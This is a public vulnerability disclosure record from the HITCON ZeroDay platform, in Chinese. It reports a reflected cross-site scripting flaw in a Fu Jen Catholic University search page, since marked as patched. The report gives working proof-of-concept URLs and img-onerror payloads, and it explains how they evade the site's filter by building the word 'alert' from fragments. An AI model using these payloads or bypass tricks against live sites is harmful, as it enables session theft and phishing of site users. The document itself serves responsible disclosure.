XSS railway.fju.edu.tw - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2026-01122
  •  發信 Vendor: 輔仁大學學校財團法人輔仁大學
  • Title: XSS railway.fju.edu.tw
  • Introduction: reflected XSS 網址reflection alert POC 已附在報告

處理狀態

目前狀態

公開
Last Update : 2026/10/08
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2026/09/02 23:37:55 : 新提交 (由 Ethan Yang 更新此狀態)
  • 2026/09/08 16:00:33 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/09/14 18:51:54 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/09/14 18:51:54 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/09/14 18:51:54 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/09/30 10:21:21 : 已修補 (由 組織帳號 更新此狀態)
  • 2026/10/08 03:00:11 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2026-01122
  • 通報者:yangminchun (Ethan Yang)
  • 風險:高
  • 類型:反射型跨站腳本攻擊 (Reflected Cross-Site Scripting)

參考資料

攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。

漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

POC:
http://runway.fju.edu.tw/searchproducer.asp?q=%3Cimg%20src%3Dx%20onerror%3Dtop%5B%2Fale%2F.source%2B%2Frt%2F.source%5D(1)%3E&number=1&ie=UTF-8
可以看到 {{IMG#1}}反射成功

敘述

漏洞種類

反射型跨站腳本攻擊 (Reflected Cross-Site Scripting, XSS)

受影響目標

  • 網址:http://runway.fju.edu.tw/searchproducer.asp (輔仁大學 跨域學習成果伸展台,140.136.202.50)

  • 參數:q

  • 英文版頁面 /searchproducer_e.asp 使用相同參數,同樣受影響

  • 該站僅提供 HTTP,未啟用 HTTPS

    重現方式

    於瀏覽器開啟以下網址,即會執行 JavaScript 並跳出 alert 視窗:

    http://runway.fju.edu.tw/searchproducer.asp?q=%3Cimg%20src%3Dx%20onerror%3Dtop%5B%2Fale%2F.source%2B%2Frt%2F.source%5D(1)%3E&number=1&ie=UTF-8

    解碼後的注入內容:

    <img src=x onerror=top/ale/.source+/rt/.source>

    注意事項(重要)

    1. number=1&ie=UTF-8 兩個參數為必要,若省略則頁面會呈現另一種檢視畫面,不會反射注入內容。
    2. 請勿直接使用 alert(1) 測試。前端過濾裝置對字串 alert、confirm、prompt 會直接重置連線 (connection reset),測試者容易誤判為「無漏洞」。上述 payload 以 /ale/.source+/rt/.source 組出 alert 字串,不含該關鍵字即可通過。
    3. 應用程式會將引號以 ASP 方式重複輸出(' → ''),因此需使用不含引號的事件處理屬性。

    技術細節

  • q 參數的值未經 HTML 編碼,直接輸出於麵包屑導覽區塊(<li class="breadcrumb-item"> 內、作者搜尋關鍵字: 之後),屬於 HTML 內容區 (element content context),可直接解析為標籤。

  • <script> 僅被改寫為 <Script>。由於 HTML 標籤名稱不區分大小寫,此改寫不具防護效果,該元素仍會被解析並執行。

  • 事件處理屬性(onerror、onload)完全未被過濾,原樣輸出。

  • GET 與 POST 兩種方式皆可觸發,因此可直接以單一網址傳播。

    已實際驗證執行(非僅反射):以 document.title=document.domain 作為 payload 於瀏覽器實測,結果為

    location.host = runway.fju.edu.tw
    document.title = "runway.fju.edu.tw"
    document.title === document.domain → true
    DOM 中存在已解析元素 <img src="x" onerror="document.title=document.domain">

    證明注入內容被瀏覽器解析為真實 DOM 元素,事件處理器成功觸發,且 JavaScript 於 runway.fju.edu.tw 來源下執行。

    影響

    攻擊者可藉由傳送單一連結(社交工程、郵件、通訊軟體)使受害者於本站來源下執行任意 JavaScript:

  • 竊取使用者 Cookie 與 Session,進而冒用身分

  • 竄改頁面內容、偽造登入表單以誘騙輸入帳號密碼

  • 對瀏覽本站的師生進行釣魚攻擊,且網域為校方正式網域,可信度高

  • 由於全站僅使用 HTTP,Cookie 於傳輸過程亦為明文,風險更為加劇

    因無需受害者填寫表單、僅需點擊網址即可觸發,實際可利用性高。

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;